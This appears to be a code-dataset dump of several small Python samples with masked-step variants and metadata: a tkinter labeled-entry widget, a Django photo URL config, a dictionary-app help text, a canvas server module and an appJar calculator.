# -*- coding: utf-8 -*- """Labeled entry widget. The goal of these widgets is twofold: to make it easier for developers to implement dialogs with compound widgets, and to naturally standardize the user interface presented to the user. """ import logging import seamm_widgets as sw import tkinter as tk import tkinter.ttk as ttk logger = logging.getLogger(__name__) options = { "entry": { "class_": "class_", "cursor": "cursor", "exportselection": "exportselection", "font": "font", "invalidcommand": "invalidcommand", "justify": "justify", "show": "show", "style": "style", "takefocus": "takefocus", "variable": "textvariable", "validate": "validate", "validatecommand": "validatecommand", "width": "width", "xscrollcommand": "xscrollcommand", }, } class LabeledEntry(sw.LabeledWidget): def __init__(self, parent, *args, **kwargs): """Initialize the instance""" class_ = kwargs.pop("class_", "MLabeledEntry") super().__init__(parent, class_=class_) interior = self.interior # entry justify = kwargs.pop("justify", tk.LEFT) entrywidth = kwargs.pop("width", 15) self.entry = ttk.Entry(interior, justify=justify, width=entrywidth) self.entry.grid(row=0, column=0, sticky=tk.EW) # interior frame self.interior = ttk.Frame(interior) self.interior.grid(row=0, column=1, sticky=tk.NSEW) interior.columnconfigure(0, weight=1) self.config(**kwargs) @property def value(self): return self.get() @value.setter def value(self, value): self.set(value) def show(self, *args): """Show only the specified subwidgets. 'all' or no arguments reverts to showing all""" super().show(*args) show_all = len(args) == 0 or args[0] == "all" if show_all or "entry" in args: self.entry.grid(row=0, column=0, sticky=tk.EW) else: self.entry.grid_forget() def set(self, value): """Set the value of the entry widget""" self.entry.delete(0, tk.END) if value is None: return self.entry.insert(0, value) def get(self): """return the current value""" value = self.entry.get() return value def config(self, **kwargs): """Set the configuration of the megawidget""" # our options that we deal with entry = options["entry"] # cannot modify kwargs while iterating over it... keys = [*kwargs.keys()] for k in keys: if k in entry: v = kwargs.pop(k) self.entry.config(**{entry[k]: v}) # having removed our options, pass rest to parent super().config(**kwargs)
normal
{ "blob_id": "111186f1d45b9cf3bf9065c7fa83a8f3f796bbe1", "index": 5841, "step-1": "<mask token>\n\n\nclass LabeledEntry(sw.LabeledWidget):\n <mask token>\n\n @property\n def value(self):\n return self.get()\n <mask token>\n\n def show(self, *args):\n \"\"\"Show only the specified subwidgets.\n 'all' or no arguments reverts to showing all\"\"\"\n super().show(*args)\n show_all = len(args) == 0 or args[0] == 'all'\n if show_all or 'entry' in args:\n self.entry.grid(row=0, column=0, sticky=tk.EW)\n else:\n self.entry.grid_forget()\n <mask token>\n\n def get(self):\n \"\"\"return the current value\"\"\"\n value = self.entry.get()\n return value\n\n def config(self, **kwargs):\n \"\"\"Set the configuration of the megawidget\"\"\"\n entry = options['entry']\n keys = [*kwargs.keys()]\n for k in keys:\n if k in entry:\n v = kwargs.pop(k)\n self.entry.config(**{entry[k]: v})\n super().config(**kwargs)\n", "step-2": "<mask token>\n\n\nclass LabeledEntry(sw.LabeledWidget):\n <mask token>\n\n @property\n def value(self):\n return self.get()\n <mask token>\n\n def show(self, *args):\n \"\"\"Show only the specified subwidgets.\n 'all' or no arguments reverts to showing all\"\"\"\n super().show(*args)\n show_all = len(args) == 0 or args[0] == 'all'\n if show_all or 'entry' in args:\n self.entry.grid(row=0, column=0, sticky=tk.EW)\n else:\n self.entry.grid_forget()\n\n def set(self, value):\n \"\"\"Set the value of the entry widget\"\"\"\n self.entry.delete(0, tk.END)\n if value is None:\n return\n self.entry.insert(0, value)\n\n def get(self):\n \"\"\"return the current value\"\"\"\n value = self.entry.get()\n return value\n\n def config(self, **kwargs):\n \"\"\"Set the configuration of the megawidget\"\"\"\n entry = options['entry']\n keys = [*kwargs.keys()]\n for k in keys:\n if k in entry:\n v = kwargs.pop(k)\n self.entry.config(**{entry[k]: v})\n super().config(**kwargs)\n", "step-3": "<mask token>\n\n\nclass LabeledEntry(sw.LabeledWidget):\n\n def __init__(self, parent, *args, **kwargs):\n \"\"\"Initialize the instance\"\"\"\n class_ = kwargs.pop('class_', 'MLabeledEntry')\n super().__init__(parent, class_=class_)\n interior = self.interior\n justify = kwargs.pop('justify', tk.LEFT)\n entrywidth = kwargs.pop('width', 15)\n self.entry = ttk.Entry(interior, justify=justify, width=entrywidth)\n self.entry.grid(row=0, column=0, sticky=tk.EW)\n self.interior = ttk.Frame(interior)\n self.interior.grid(row=0, column=1, sticky=tk.NSEW)\n interior.columnconfigure(0, weight=1)\n self.config(**kwargs)\n\n @property\n def value(self):\n return self.get()\n\n @value.setter\n def value(self, value):\n self.set(value)\n\n def show(self, *args):\n \"\"\"Show only the specified subwidgets.\n 'all' or no arguments reverts to showing all\"\"\"\n super().show(*args)\n show_all = len(args) == 0 or args[0] == 'all'\n if show_all or 'entry' in args:\n self.entry.grid(row=0, column=0, sticky=tk.EW)\n else:\n self.entry.grid_forget()\n\n def set(self, value):\n \"\"\"Set the value of the entry widget\"\"\"\n self.entry.delete(0, tk.END)\n if value is None:\n return\n self.entry.insert(0, value)\n\n def get(self):\n \"\"\"return the current value\"\"\"\n value = self.entry.get()\n return value\n\n def config(self, **kwargs):\n \"\"\"Set the configuration of the megawidget\"\"\"\n entry = options['entry']\n keys = [*kwargs.keys()]\n for k in keys:\n if k in entry:\n v = kwargs.pop(k)\n self.entry.config(**{entry[k]: v})\n super().config(**kwargs)\n", "step-4": "<mask token>\nlogger = logging.getLogger(__name__)\noptions = {'entry': {'class_': 'class_', 'cursor': 'cursor',\n 'exportselection': 'exportselection', 'font': 'font', 'invalidcommand':\n 'invalidcommand', 'justify': 'justify', 'show': 'show', 'style':\n 'style', 'takefocus': 'takefocus', 'variable': 'textvariable',\n 'validate': 'validate', 'validatecommand': 'validatecommand', 'width':\n 'width', 'xscrollcommand': 'xscrollcommand'}}\n\n\nclass LabeledEntry(sw.LabeledWidget):\n\n def __init__(self, parent, *args, **kwargs):\n \"\"\"Initialize the instance\"\"\"\n class_ = kwargs.pop('class_', 'MLabeledEntry')\n super().__init__(parent, class_=class_)\n interior = self.interior\n justify = kwargs.pop('justify', tk.LEFT)\n entrywidth = kwargs.pop('width', 15)\n self.entry = ttk.Entry(interior, justify=justify, width=entrywidth)\n self.entry.grid(row=0, column=0, sticky=tk.EW)\n self.interior = ttk.Frame(interior)\n self.interior.grid(row=0, column=1, sticky=tk.NSEW)\n interior.columnconfigure(0, weight=1)\n self.config(**kwargs)\n\n @property\n def value(self):\n return self.get()\n\n @value.setter\n def value(self, value):\n self.set(value)\n\n def show(self, *args):\n \"\"\"Show only the specified subwidgets.\n 'all' or no arguments reverts to showing all\"\"\"\n super().show(*args)\n show_all = len(args) == 0 or args[0] == 'all'\n if show_all or 'entry' in args:\n self.entry.grid(row=0, column=0, sticky=tk.EW)\n else:\n self.entry.grid_forget()\n\n def set(self, value):\n \"\"\"Set the value of the entry widget\"\"\"\n self.entry.delete(0, tk.END)\n if value is None:\n return\n self.entry.insert(0, value)\n\n def get(self):\n \"\"\"return the current value\"\"\"\n value = self.entry.get()\n return value\n\n def config(self, **kwargs):\n \"\"\"Set the configuration of the megawidget\"\"\"\n entry = options['entry']\n keys = [*kwargs.keys()]\n for k in keys:\n if k in entry:\n v = kwargs.pop(k)\n self.entry.config(**{entry[k]: v})\n super().config(**kwargs)\n", "step-5": "# -*- coding: utf-8 -*-\n\n\"\"\"Labeled entry widget.\n\nThe goal of these widgets is twofold: to make it easier for developers\nto implement dialogs with compound widgets, and to naturally\nstandardize the user interface presented to the user.\n\"\"\"\n\nimport logging\nimport seamm_widgets as sw\nimport tkinter as tk\nimport tkinter.ttk as ttk\n\nlogger = logging.getLogger(__name__)\n\noptions = {\n \"entry\": {\n \"class_\": \"class_\",\n \"cursor\": \"cursor\",\n \"exportselection\": \"exportselection\",\n \"font\": \"font\",\n \"invalidcommand\": \"invalidcommand\",\n \"justify\": \"justify\",\n \"show\": \"show\",\n \"style\": \"style\",\n \"takefocus\": \"takefocus\",\n \"variable\": \"textvariable\",\n \"validate\": \"validate\",\n \"validatecommand\": \"validatecommand\",\n \"width\": \"width\",\n \"xscrollcommand\": \"xscrollcommand\",\n },\n}\n\n\nclass LabeledEntry(sw.LabeledWidget):\n def __init__(self, parent, *args, **kwargs):\n \"\"\"Initialize the instance\"\"\"\n class_ = kwargs.pop(\"class_\", \"MLabeledEntry\")\n super().__init__(parent, class_=class_)\n\n interior = self.interior\n\n # entry\n justify = kwargs.pop(\"justify\", tk.LEFT)\n entrywidth = kwargs.pop(\"width\", 15)\n\n self.entry = ttk.Entry(interior, justify=justify, width=entrywidth)\n self.entry.grid(row=0, column=0, sticky=tk.EW)\n\n # interior frame\n self.interior = ttk.Frame(interior)\n self.interior.grid(row=0, column=1, sticky=tk.NSEW)\n\n interior.columnconfigure(0, weight=1)\n\n self.config(**kwargs)\n\n @property\n def value(self):\n return self.get()\n\n @value.setter\n def value(self, value):\n self.set(value)\n\n def show(self, *args):\n \"\"\"Show only the specified subwidgets.\n 'all' or no arguments reverts to showing all\"\"\"\n\n super().show(*args)\n\n show_all = len(args) == 0 or args[0] == \"all\"\n\n if show_all or \"entry\" in args:\n self.entry.grid(row=0, column=0, sticky=tk.EW)\n else:\n self.entry.grid_forget()\n\n def set(self, value):\n \"\"\"Set the value of the entry widget\"\"\"\n\n self.entry.delete(0, tk.END)\n if value is None:\n return\n\n self.entry.insert(0, value)\n\n def get(self):\n \"\"\"return the current value\"\"\"\n value = self.entry.get()\n return value\n\n def config(self, **kwargs):\n \"\"\"Set the configuration of the megawidget\"\"\"\n\n # our options that we deal with\n entry = options[\"entry\"]\n\n # cannot modify kwargs while iterating over it...\n keys = [*kwargs.keys()]\n for k in keys:\n if k in entry:\n v = kwargs.pop(k)\n self.entry.config(**{entry[k]: v})\n\n # having removed our options, pass rest to parent\n super().config(**kwargs)\n", "step-ids": [ 5, 6, 8, 9, 11 ] }
[ 5, 6, 8, 9, 11 ]
from django.urls import path from photo.api.views import api_photo_detail_view, api_photos_view urlpatterns = [path('<int:id>', api_photo_detail_view, name='user_detail'), path('', api_photos_view, name='users')]
normal
{ "blob_id": "ab4145ccc0b360dcca9b9aa6ebe919bdddac65a2", "index": 3962, "step-1": "<mask token>\n", "step-2": "<mask token>\nurlpatterns = [path('<int:id>', api_photo_detail_view, name='user_detail'),\n path('', api_photos_view, name='users')]\n", "step-3": "from django.urls import path\nfrom photo.api.views import api_photo_detail_view, api_photos_view\nurlpatterns = [path('<int:id>', api_photo_detail_view, name='user_detail'),\n path('', api_photos_view, name='users')]\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
#!/usr/bin/env python # -*- coding: utf-8 -*- help_txt = """ :help, show this help menu. :help [command] for detail :dict [word], only find translation on dict.cn :google [sentence], only find translation on google api :lan2lan [sentence], translate from one language to another language :add [word], add new word to your library :del [word], delete word from your library :list [number], list words in your library :rating [number], lsit words in your library with a certain rate :history [number], show your search history :clear, clear your oldest 100 history for more information, browser http://mardict.appspot.com """ help_dict = """ help on dict: [usage] :dict word [intro] translate your word only use dict.cn api [eg] :dict hello more on http://mardict.appspot.com/help/#dict """ help_google = """ help on google: [usage] :google word [intro] translate your word only use google api [eg] :google google is a bitch more on http://mardict.appspot.com/help/#google """ help_lan2lan = """ help on lan2lan: [usage] :lan2lan word [intro] translate from one language to another language by google translation api [eg] :en2zh hello more on http://mardict.appspot.com/help/#lan2lan """ help_history = """ help on history: [usage] :history (number) [intro] list your search history [eg] :history 9 more on http://mardict.appspot.com/help/#history """ help_clear = """ help on clear: [usage] :clear [intro] clear your search history more on http://mardict.appspot.com/help/#clear """ help_add = """ help on add: [usage] :add (word) [intro] add the new word to your library(storing your unfamiliar word) [eg] :add hello more on http://mardict.appspot.com/help/#add """ help_del = """ help on del: [usage] :del word [intro] delete the word from your library [eg] :del hello more on http://mardict.appspot.com/help/#del """ help_list = """ help on list: [usage] :list (number) [intro] list a certain number of words from your library. [eg] :list 9 this function is very complex, browser the website. more on http://mardict.appspot.com/help/#list """ help_rating = """ help on rating: [usage] :rating (number) [intro] list a certain number of words from your library with a certain rate. [eg] :rating 0 9 this function is very complex, browser the website. more on http://mardict.appspot.com/help/#rating """
normal
{ "blob_id": "3fadb91bd2367819a540f687530f4b48ed878423", "index": 9149, "step-1": "<mask token>\n", "step-2": "help_txt = \"\"\"\n:help, show this help menu. :help [command] for detail\n:dict [word], only find translation on dict.cn\n:google [sentence], only find translation on google api\n:lan2lan [sentence], translate from one language to another language\n:add [word], add new word to your library\n:del [word], delete word from your library\n:list [number], list words in your library\n:rating [number], lsit words in your library with a certain rate\n:history [number], show your search history\n:clear, clear your oldest 100 history\n\nfor more information, browser http://mardict.appspot.com\n\"\"\"\nhelp_dict = \"\"\"\nhelp on dict:\n[usage] :dict word\n[intro] translate your word only use dict.cn api\n[eg] :dict hello\n\nmore on http://mardict.appspot.com/help/#dict\n\"\"\"\nhelp_google = \"\"\"\nhelp on google:\n[usage] :google word\n[intro] translate your word only use google api\n[eg] :google google is a bitch\n\nmore on http://mardict.appspot.com/help/#google\n\"\"\"\nhelp_lan2lan = \"\"\"\nhelp on lan2lan:\n[usage] :lan2lan word\n[intro] translate from one language to another language by google translation api\n[eg] :en2zh hello\n\nmore on http://mardict.appspot.com/help/#lan2lan\n\"\"\"\nhelp_history = \"\"\"\nhelp on history:\n[usage] :history (number)\n[intro] list your search history\n[eg] :history 9\n\nmore on http://mardict.appspot.com/help/#history\n\"\"\"\nhelp_clear = \"\"\"\nhelp on clear:\n[usage] :clear\n[intro] clear your search history\n\nmore on http://mardict.appspot.com/help/#clear\n\"\"\"\nhelp_add = \"\"\"\nhelp on add:\n[usage] :add (word)\n[intro] add the new word to your library(storing your unfamiliar word)\n[eg] :add hello\n\nmore on http://mardict.appspot.com/help/#add\n\"\"\"\nhelp_del = \"\"\"\nhelp on del:\n[usage] :del word\n[intro] delete the word from your library\n[eg] :del hello\n\nmore on http://mardict.appspot.com/help/#del\n\"\"\"\nhelp_list = \"\"\"\nhelp on list:\n[usage] :list (number)\n[intro] list a certain number of words from your library.\n[eg] :list 9\n\nthis function is very complex, browser the website.\n\nmore on http://mardict.appspot.com/help/#list\n\"\"\"\nhelp_rating = \"\"\"\nhelp on rating:\n[usage] :rating (number)\n[intro] list a certain number of words from your library with a certain rate.\n[eg] :rating 0 9\n\nthis function is very complex, browser the website.\n\nmore on http://mardict.appspot.com/help/#rating\n\"\"\"\n", "step-3": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nhelp_txt = \"\"\"\n:help, show this help menu. :help [command] for detail\n:dict [word], only find translation on dict.cn\n:google [sentence], only find translation on google api\n:lan2lan [sentence], translate from one language to another language\n:add [word], add new word to your library\n:del [word], delete word from your library\n:list [number], list words in your library\n:rating [number], lsit words in your library with a certain rate\n:history [number], show your search history\n:clear, clear your oldest 100 history\n\nfor more information, browser http://mardict.appspot.com\n\"\"\"\n\nhelp_dict = \"\"\"\nhelp on dict:\n[usage] :dict word\n[intro] translate your word only use dict.cn api\n[eg] :dict hello\n\nmore on http://mardict.appspot.com/help/#dict\n\"\"\"\n\nhelp_google = \"\"\"\nhelp on google:\n[usage] :google word\n[intro] translate your word only use google api\n[eg] :google google is a bitch\n\nmore on http://mardict.appspot.com/help/#google\n\"\"\"\n\nhelp_lan2lan = \"\"\"\nhelp on lan2lan:\n[usage] :lan2lan word\n[intro] translate from one language to another language by google translation api\n[eg] :en2zh hello\n\nmore on http://mardict.appspot.com/help/#lan2lan\n\"\"\"\n\nhelp_history = \"\"\"\nhelp on history:\n[usage] :history (number)\n[intro] list your search history\n[eg] :history 9\n\nmore on http://mardict.appspot.com/help/#history\n\"\"\"\n\nhelp_clear = \"\"\"\nhelp on clear:\n[usage] :clear\n[intro] clear your search history\n\nmore on http://mardict.appspot.com/help/#clear\n\"\"\"\n\nhelp_add = \"\"\"\nhelp on add:\n[usage] :add (word)\n[intro] add the new word to your library(storing your unfamiliar word)\n[eg] :add hello\n\nmore on http://mardict.appspot.com/help/#add\n\"\"\"\n\nhelp_del = \"\"\"\nhelp on del:\n[usage] :del word\n[intro] delete the word from your library\n[eg] :del hello\n\nmore on http://mardict.appspot.com/help/#del\n\"\"\"\n\nhelp_list = \"\"\"\nhelp on list:\n[usage] :list (number)\n[intro] list a certain number of words from your library.\n[eg] :list 9\n\nthis function is very complex, browser the website.\n\nmore on http://mardict.appspot.com/help/#list\n\"\"\"\n\nhelp_rating = \"\"\"\nhelp on rating:\n[usage] :rating (number)\n[intro] list a certain number of words from your library with a certain rate.\n[eg] :rating 0 9\n\nthis function is very complex, browser the website.\n\nmore on http://mardict.appspot.com/help/#rating\n\"\"\"\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
<|reserved_special_token_0|> def http_server(file: str=None, host: str='localhost', port: int=5050 ) ->CanvasServer: """Creates a new HTTP server for displaying the network, using WebSockets to transmit data. The server will only start once its :meth:`~server.CanvasServer.start` method is called. After the server has started, the network can be viewed by opening a browser and navigating to the address ``http://localhost:5050/`` (change the port as necessary). :file: (Optional) The path to the HTML file which the server should display, relative to the current runtime directory. If unspecified, the default HTML file will be used. When creating a custom HTML interface, use the default file as a guide. :type file: str :port: (Optional) The port on which the server should start, defaulting to to 5050. Note that the next port (by default 5051) will also be used to transmit data through WebSockets. :type port: int """ return CanvasServer(file, host, port) <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def http_server(file: str=None, host: str='localhost', port: int=5050 ) ->CanvasServer: """Creates a new HTTP server for displaying the network, using WebSockets to transmit data. The server will only start once its :meth:`~server.CanvasServer.start` method is called. After the server has started, the network can be viewed by opening a browser and navigating to the address ``http://localhost:5050/`` (change the port as necessary). :file: (Optional) The path to the HTML file which the server should display, relative to the current runtime directory. If unspecified, the default HTML file will be used. When creating a custom HTML interface, use the default file as a guide. :type file: str :port: (Optional) The port on which the server should start, defaulting to to 5050. Note that the next port (by default 5051) will also be used to transmit data through WebSockets. :type port: int """ return CanvasServer(file, host, port) def jupyter_canvas(buttons: bool=False) ->JupyterCanvas: """Creates a new :class:`~api.Canvas` which will dispatch and receive events through a Jupyter widget, and which can be displayed using the IPython ``display`` function. By default, the canvas size is (400, 250), and requires the ``ctrl``/``cmd`` to be held down while zooming.""" if HAS_JUPYTER: return create_jupyter_canvas(buttons=buttons) else: raise Exception('Jupyter is not installed') <|reserved_special_token_1|> <|reserved_special_token_0|> try: from .jupyter import JupyterCanvas, create_jupyter_canvas HAS_JUPYTER = True except: HAS_JUPYTER = False JupyterCanvas = None def http_server(file: str=None, host: str='localhost', port: int=5050 ) ->CanvasServer: """Creates a new HTTP server for displaying the network, using WebSockets to transmit data. The server will only start once its :meth:`~server.CanvasServer.start` method is called. After the server has started, the network can be viewed by opening a browser and navigating to the address ``http://localhost:5050/`` (change the port as necessary). :file: (Optional) The path to the HTML file which the server should display, relative to the current runtime directory. If unspecified, the default HTML file will be used. When creating a custom HTML interface, use the default file as a guide. :type file: str :port: (Optional) The port on which the server should start, defaulting to to 5050. Note that the next port (by default 5051) will also be used to transmit data through WebSockets. :type port: int """ return CanvasServer(file, host, port) def jupyter_canvas(buttons: bool=False) ->JupyterCanvas: """Creates a new :class:`~api.Canvas` which will dispatch and receive events through a Jupyter widget, and which can be displayed using the IPython ``display`` function. By default, the canvas size is (400, 250), and requires the ``ctrl``/``cmd`` to be held down while zooming.""" if HAS_JUPYTER: return create_jupyter_canvas(buttons=buttons) else: raise Exception('Jupyter is not installed') <|reserved_special_token_1|> from .server import CanvasServer try: from .jupyter import JupyterCanvas, create_jupyter_canvas HAS_JUPYTER = True except: HAS_JUPYTER = False JupyterCanvas = None def http_server(file: str=None, host: str='localhost', port: int=5050 ) ->CanvasServer: """Creates a new HTTP server for displaying the network, using WebSockets to transmit data. The server will only start once its :meth:`~server.CanvasServer.start` method is called. After the server has started, the network can be viewed by opening a browser and navigating to the address ``http://localhost:5050/`` (change the port as necessary). :file: (Optional) The path to the HTML file which the server should display, relative to the current runtime directory. If unspecified, the default HTML file will be used. When creating a custom HTML interface, use the default file as a guide. :type file: str :port: (Optional) The port on which the server should start, defaulting to to 5050. Note that the next port (by default 5051) will also be used to transmit data through WebSockets. :type port: int """ return CanvasServer(file, host, port) def jupyter_canvas(buttons: bool=False) ->JupyterCanvas: """Creates a new :class:`~api.Canvas` which will dispatch and receive events through a Jupyter widget, and which can be displayed using the IPython ``display`` function. By default, the canvas size is (400, 250), and requires the ``ctrl``/``cmd`` to be held down while zooming.""" if HAS_JUPYTER: return create_jupyter_canvas(buttons=buttons) else: raise Exception('Jupyter is not installed') <|reserved_special_token_1|> from .server import CanvasServer try: from .jupyter import JupyterCanvas, create_jupyter_canvas HAS_JUPYTER = True except: HAS_JUPYTER = False JupyterCanvas = None # type: ignore def http_server( file: str = None, host: str = "localhost", port: int = 5050 ) -> CanvasServer: """Creates a new HTTP server for displaying the network, using WebSockets to transmit data. The server will only start once its :meth:`~server.CanvasServer.start` method is called. After the server has started, the network can be viewed by opening a browser and navigating to the address ``http://localhost:5050/`` (change the port as necessary). :file: (Optional) The path to the HTML file which the server should display, relative to the current runtime directory. If unspecified, the default HTML file will be used. When creating a custom HTML interface, use the default file as a guide. :type file: str :port: (Optional) The port on which the server should start, defaulting to to 5050. Note that the next port (by default 5051) will also be used to transmit data through WebSockets. :type port: int """ return CanvasServer(file, host, port) def jupyter_canvas(buttons: bool = False) -> JupyterCanvas: """Creates a new :class:`~api.Canvas` which will dispatch and receive events through a Jupyter widget, and which can be displayed using the IPython ``display`` function. By default, the canvas size is (400, 250), and requires the ``ctrl``/``cmd`` to be held down while zooming.""" if HAS_JUPYTER: return create_jupyter_canvas(buttons=buttons) else: raise Exception("Jupyter is not installed")
flexible
{ "blob_id": "b11e2837d3ba9c14770b8039186a2175adc41ea1", "index": 283, "step-1": "<mask token>\n\n\ndef http_server(file: str=None, host: str='localhost', port: int=5050\n ) ->CanvasServer:\n \"\"\"Creates a new HTTP server for displaying the network, using WebSockets to\n transmit data. The server will only start once its\n :meth:`~server.CanvasServer.start` method is called. After the server has started,\n the network can be viewed by opening a browser and navigating to the address\n ``http://localhost:5050/`` (change the port as necessary).\n\n :file: (Optional) The path to the HTML file which the server should display,\n relative to the current runtime directory. If unspecified, the default HTML file\n will be used. When creating a custom HTML interface, use the default file as a\n guide.\n :type file: str\n\n :port: (Optional) The port on which the server should start, defaulting to to 5050.\n Note that the next port (by default 5051) will also be used to transmit data\n through WebSockets.\n :type port: int\n \"\"\"\n return CanvasServer(file, host, port)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef http_server(file: str=None, host: str='localhost', port: int=5050\n ) ->CanvasServer:\n \"\"\"Creates a new HTTP server for displaying the network, using WebSockets to\n transmit data. The server will only start once its\n :meth:`~server.CanvasServer.start` method is called. After the server has started,\n the network can be viewed by opening a browser and navigating to the address\n ``http://localhost:5050/`` (change the port as necessary).\n\n :file: (Optional) The path to the HTML file which the server should display,\n relative to the current runtime directory. If unspecified, the default HTML file\n will be used. When creating a custom HTML interface, use the default file as a\n guide.\n :type file: str\n\n :port: (Optional) The port on which the server should start, defaulting to to 5050.\n Note that the next port (by default 5051) will also be used to transmit data\n through WebSockets.\n :type port: int\n \"\"\"\n return CanvasServer(file, host, port)\n\n\ndef jupyter_canvas(buttons: bool=False) ->JupyterCanvas:\n \"\"\"Creates a new :class:`~api.Canvas` which will dispatch and receive\n events through a Jupyter widget, and which can be displayed using the IPython\n ``display`` function.\n\n By default, the canvas size is (400, 250), and requires the ``ctrl``/``cmd`` to be\n held down while zooming.\"\"\"\n if HAS_JUPYTER:\n return create_jupyter_canvas(buttons=buttons)\n else:\n raise Exception('Jupyter is not installed')\n", "step-3": "<mask token>\ntry:\n from .jupyter import JupyterCanvas, create_jupyter_canvas\n HAS_JUPYTER = True\nexcept:\n HAS_JUPYTER = False\n JupyterCanvas = None\n\n\ndef http_server(file: str=None, host: str='localhost', port: int=5050\n ) ->CanvasServer:\n \"\"\"Creates a new HTTP server for displaying the network, using WebSockets to\n transmit data. The server will only start once its\n :meth:`~server.CanvasServer.start` method is called. After the server has started,\n the network can be viewed by opening a browser and navigating to the address\n ``http://localhost:5050/`` (change the port as necessary).\n\n :file: (Optional) The path to the HTML file which the server should display,\n relative to the current runtime directory. If unspecified, the default HTML file\n will be used. When creating a custom HTML interface, use the default file as a\n guide.\n :type file: str\n\n :port: (Optional) The port on which the server should start, defaulting to to 5050.\n Note that the next port (by default 5051) will also be used to transmit data\n through WebSockets.\n :type port: int\n \"\"\"\n return CanvasServer(file, host, port)\n\n\ndef jupyter_canvas(buttons: bool=False) ->JupyterCanvas:\n \"\"\"Creates a new :class:`~api.Canvas` which will dispatch and receive\n events through a Jupyter widget, and which can be displayed using the IPython\n ``display`` function.\n\n By default, the canvas size is (400, 250), and requires the ``ctrl``/``cmd`` to be\n held down while zooming.\"\"\"\n if HAS_JUPYTER:\n return create_jupyter_canvas(buttons=buttons)\n else:\n raise Exception('Jupyter is not installed')\n", "step-4": "from .server import CanvasServer\ntry:\n from .jupyter import JupyterCanvas, create_jupyter_canvas\n HAS_JUPYTER = True\nexcept:\n HAS_JUPYTER = False\n JupyterCanvas = None\n\n\ndef http_server(file: str=None, host: str='localhost', port: int=5050\n ) ->CanvasServer:\n \"\"\"Creates a new HTTP server for displaying the network, using WebSockets to\n transmit data. The server will only start once its\n :meth:`~server.CanvasServer.start` method is called. After the server has started,\n the network can be viewed by opening a browser and navigating to the address\n ``http://localhost:5050/`` (change the port as necessary).\n\n :file: (Optional) The path to the HTML file which the server should display,\n relative to the current runtime directory. If unspecified, the default HTML file\n will be used. When creating a custom HTML interface, use the default file as a\n guide.\n :type file: str\n\n :port: (Optional) The port on which the server should start, defaulting to to 5050.\n Note that the next port (by default 5051) will also be used to transmit data\n through WebSockets.\n :type port: int\n \"\"\"\n return CanvasServer(file, host, port)\n\n\ndef jupyter_canvas(buttons: bool=False) ->JupyterCanvas:\n \"\"\"Creates a new :class:`~api.Canvas` which will dispatch and receive\n events through a Jupyter widget, and which can be displayed using the IPython\n ``display`` function.\n\n By default, the canvas size is (400, 250), and requires the ``ctrl``/``cmd`` to be\n held down while zooming.\"\"\"\n if HAS_JUPYTER:\n return create_jupyter_canvas(buttons=buttons)\n else:\n raise Exception('Jupyter is not installed')\n", "step-5": "from .server import CanvasServer\n\ntry:\n from .jupyter import JupyterCanvas, create_jupyter_canvas\n\n HAS_JUPYTER = True\nexcept:\n HAS_JUPYTER = False\n JupyterCanvas = None # type: ignore\n\n\ndef http_server(\n file: str = None, host: str = \"localhost\", port: int = 5050\n) -> CanvasServer:\n \"\"\"Creates a new HTTP server for displaying the network, using WebSockets to\n transmit data. The server will only start once its\n :meth:`~server.CanvasServer.start` method is called. After the server has started,\n the network can be viewed by opening a browser and navigating to the address\n ``http://localhost:5050/`` (change the port as necessary).\n\n :file: (Optional) The path to the HTML file which the server should display,\n relative to the current runtime directory. If unspecified, the default HTML file\n will be used. When creating a custom HTML interface, use the default file as a\n guide.\n :type file: str\n\n :port: (Optional) The port on which the server should start, defaulting to to 5050.\n Note that the next port (by default 5051) will also be used to transmit data\n through WebSockets.\n :type port: int\n \"\"\"\n return CanvasServer(file, host, port)\n\n\ndef jupyter_canvas(buttons: bool = False) -> JupyterCanvas:\n \"\"\"Creates a new :class:`~api.Canvas` which will dispatch and receive\n events through a Jupyter widget, and which can be displayed using the IPython\n ``display`` function.\n\n By default, the canvas size is (400, 250), and requires the ``ctrl``/``cmd`` to be\n held down while zooming.\"\"\"\n if HAS_JUPYTER:\n return create_jupyter_canvas(buttons=buttons)\n else:\n raise Exception(\"Jupyter is not installed\")\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
from appJar import gui app = gui("Calculator", "560x240") ### FUNCTIONS ### n1, n2 = 0.0, 0.0 result = 0.0 isFirst = True calc = "" def doMath(btn): global result, n1, n2, isFirst, calc inputNumber() if(btn == "Add"): calc = "a" if(btn == "Substract"): calc = "s" if(btn == "Multiply"): calc = "m" if(btn == "Divide"): calc = "d" app.clearEntry("Number") def calculate(btn): global result, n1, n2, isFirst, calc inputNumber() if(calc == 'a'): result = n1 + n2 if(calc == 's'): result = n1 - n2 if(calc == 'm'): result = n1 * n2 if(calc == 'd'): try: result = n1 / n2 except ZeroDivisionError: clearOut(btn) app.errorBox("DivisionByZero", "You can't divide by Zero.") app.clearEntry("Number") app.setLabel("Result", result) def clearOut(btn): global result, n1, n2, isFirst, calc n1, n2 = 0.0, 0.0 result = 0.0 isFirst = True calc = "" def inputNumber(): global n1, n2, isFirst if(isFirst): n1 = app.getEntry("Number") isFirst = False else: n2 = app.getEntry("Number") isFirst = True ### FUNCTIONS ### app.setStretch("column") app.setSticky("") app.setResizable(True) app.addNumericEntry("Number") app.setEntryDefault("Number", "Enter Number") app.addButtons(["Add", "Substract", "Multiply", "Divide"], doMath) app.addButtons(["Calculate!", "clearOut"], [calculate, clearOut]) app.setButton("clearOut", "C") app.addEmptyLabel("Result") app.go()
normal
